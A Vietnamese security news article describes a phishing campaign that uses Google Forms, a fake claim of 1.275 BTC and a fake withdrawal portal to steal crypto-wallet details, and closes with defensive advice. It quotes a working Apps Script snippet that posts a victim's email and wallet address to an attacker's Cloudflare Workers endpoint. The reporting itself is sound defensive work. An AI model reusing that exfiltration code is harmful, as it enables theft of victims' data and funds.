Google Forms bị lạm dụng trong chiến dịch lừa đảo tiền điện tử quy mô lớn

[WhiteHat Team]

Google Forms vốn là công cụ khảo sát phổ biến nhờ dễ dùng và miễn phí, nhưng giờ đây, tin tặc lại lợi dụng chính uy tín của nền tảng này để phát động chiến dịch lừa đảo tiền điện tử quy mô lớn. Chúng khai thác kỹ thuật xã hội để đánh cắp thông tin ví tiền điện tử và chiếm đoạt tài sản.

Chiến dịch phishing tinh vi giả mạo sàn giao dịch​

Chiến dịch được phát hiện từ cuối năm 2024 nhưng chỉ thực sự bùng phát trong quý II năm 2025. Mọi thứ bắt đầu bằng một email không mong đợi chứa liên kết forms.gle có hình thức hợp pháp và dễ dàng vượt qua hầu hết các bộ lọc thư rác. Khi nạn nhân mở liên kết, họ sẽ được đưa tới một biểu mẫu Google Forms giả mạo một sàn giao dịch tiền mã hóa nổi tiếng, với thông báo về khoản thanh toán 1.275 BTC đang chờ xử lý.

Nếu người dùng tiếp tục làm theo hướng dẫn, họ sẽ bị chuyển đến một cổng rút tiền giả, nơi yêu cầu xác minh địa chỉ ví và thanh toán một khoản phí mạng nhỏ. Các thông tin được nhập vào sẽ ngay lập tức bị chuyển tới máy chủ điều khiển C2 được ẩn danh phía sau hạ tầng Cloudflare Workers. Khoản phí chuyển đi sẽ được đưa thẳng đến ví mixer, làm biến mất hoàn toàn dấu vết giao dịch.

Tận dụng hạ tầng Google để qua mặt hệ thống lọc thư​

Một trong những yếu tố giúp chiến dịch lừa đảo này đạt tỷ lệ thành công cao bất thường nằm ở việc lợi dụng chính hạ tầng của Google để phân phối email. Cụ thể, toàn bộ thư mạo danh đều được gửi qua máy chủ SMTP chính chủ của Google, tức là sử dụng domain google.com với chứng thực SPF, DKIM và DMARC hoàn toàn hợp lệ. Điều này khiến hầu hết các hệ thống lọc thư rác và kiểm tra danh tiếng tên miền đều đánh giá các email này là hợp pháp, cho phép chúng đi thẳng vào hộp thư chính (Inbox) thay vì bị gắn nhãn nguy hiểm hay chuyển vào mục spam.

Không chỉ vượt qua được kiểm duyệt kỹ thuật, chiến dịch còn khai thác niềm tin sẵn có của người dùng với Google. Các liên kết forms.gle không những trông quen thuộc mà còn được các trình quét URL đánh giá là an toàn, khiến nạn nhân dễ bị đánh lừa và nhấp vào mà không nghi ngờ.

Theo số liệu từ Kaspersky, trong tháng 7 năm 2025, các cuộc tấn công phishing có sử dụng Google Forms đã tăng đến 63% so với trung bình các tháng trước đó. Các chuyên gia đánh giá đây là một trong những chiến dịch lừa đảo sử dụng kỹ thuật xã hội hiệu quả nhất trong năm. Dù không sử dụng phần mềm độc hại hay khai thác lỗ hổng phức tạp, nhưng việc khai thác các công cụ hợp pháp và danh tiếng tên miền uy tín đã giúp tin tặc dễ dàng vượt qua các lớp bảo vệ truyền thống.

Cơ chế tấn công: Thu thập thông tin qua WebHook và mã độc JavaScript​

Điểm mấu chốt trong quy trình đánh cắp thông tin là đoạn mã script gắn kèm trong biểu mẫu Google Forms. Tin tặc sử dụng Apps Script WebHook, một tính năng hợp pháp trong hệ sinh thái Google Workspace, để bí mật thu thập dữ liệu ngay khi người dùng nhấn nút “Submit”. Hành động tưởng chừng vô hại này thực chất kích hoạt quá trình gửi thông tin ví và email của nạn nhân tới một máy chủ điều khiển C2 đặt sau lớp ẩn danh của dịch vụ Cloudflare Workers.

Không dừng lại ở đó, biểu mẫu còn nhúng một đoạn JavaScript redirect một lần, tự động điều hướng trình duyệt sang một trang web giả có địa chỉ hxxps://claim-btc-id[.]online. Đây là một bản sao được thiết kế tinh vi, sử dụng giao diện React bóng bẩy để tạo cảm giác chuyên nghiệp và tích hợp backend Flask đóng vai trò proxy. Mọi tương tác tại đây đều được chuyển tiếp ngầm về máy chủ của kẻ tấn công.

Một đoạn mã rò rỉ từ mẫu biểu mẫu cho thấy cách thông tin bị khai thác ngay sau khi gửi:

function onFormSubmit(e){
  const payload = JSON.stringify({
    email: e.namedValues['Email'][0],
    wallet: e.namedValues['Wallet Address'][0]
  });
  UrlFetchApp.fetch('https://worker-cryptodrip.workers.dev/submit', {
    method: 'post',
    contentType: 'application/json',
    payload: payload
  });
}

Đoạn script này trông hợp lệ trong môi trường biểu mẫu Google, nhưng thực chất lại là cơ chế truyền dữ liệu trực tiếp về hệ thống điều khiển của tin tặc, hoàn toàn không để lại cảnh báo hay dấu hiệu bất thường nào trên giao diện người dùng. Khi kết hợp với chiêu dụ hứa hẹn "nhận thưởng BTC", chiến dịch này đánh trúng vào lòng tham và sự thiếu cảnh giác, khiến nạn nhân mất tiền chỉ sau vài cú nhấp chuột.

Biện pháp phòng ngừa​

Trước làn sóng lạm dụng Google Forms trong các chiến dịch lừa đảo, Kaspersky khuyến cáo các tổ chức cần triển khai một chiến lược phòng thủ nhiều tầng, bao gồm:

• Thiết lập chính sách kiểm soát nội dung đối với email chứa Google Forms, áp dụng chế độ cách ly (quarantine) mặc định trừ khi nguồn gửi đã được đưa vào danh sách trắng và xác thực rõ ràng
• Cài đặt tiện ích trình duyệt bảo mật có khả năng chặn các yêu cầu outbound tới các tên miền không xác định trên nền tảng Cloudflare Workers, nơi thường được tin tặc dùng để ẩn danh máy chủ điều khiển C2
• Tổ chức đào tạo nhận thức an ninh mạng cho nhân viên, nhấn mạnh các nguyên tắc cơ bản như “không bao giờ có tiền mã hóa miễn phí chỉ thông qua một biểu mẫu trực tuyến”

Chiến dịch này cho thấy mức độ rủi ro nghiêm trọng khi các nền tảng hợp pháp bị tin tặc khai thác sai mục đích, biến công cụ chính thống thành kênh phát tán lừa đảo tinh vi. Đây cũng là minh chứng rõ ràng cho thấy kỹ thuật xã hội vẫn luôn là một trong những vũ khí nguy hiểm nhất của tội phạm mạng. Không đòi hỏi kỹ thuật cao, không cần tấn công hạ tầng, chỉ bằng thao tác giả mạo và lời hứa hấp dẫn, kẻ tấn công có thể khiến người dùng tự nguyện trao đi tài sản số chỉ trong vài cú nhấp chuột.

Theo Cyber Security News​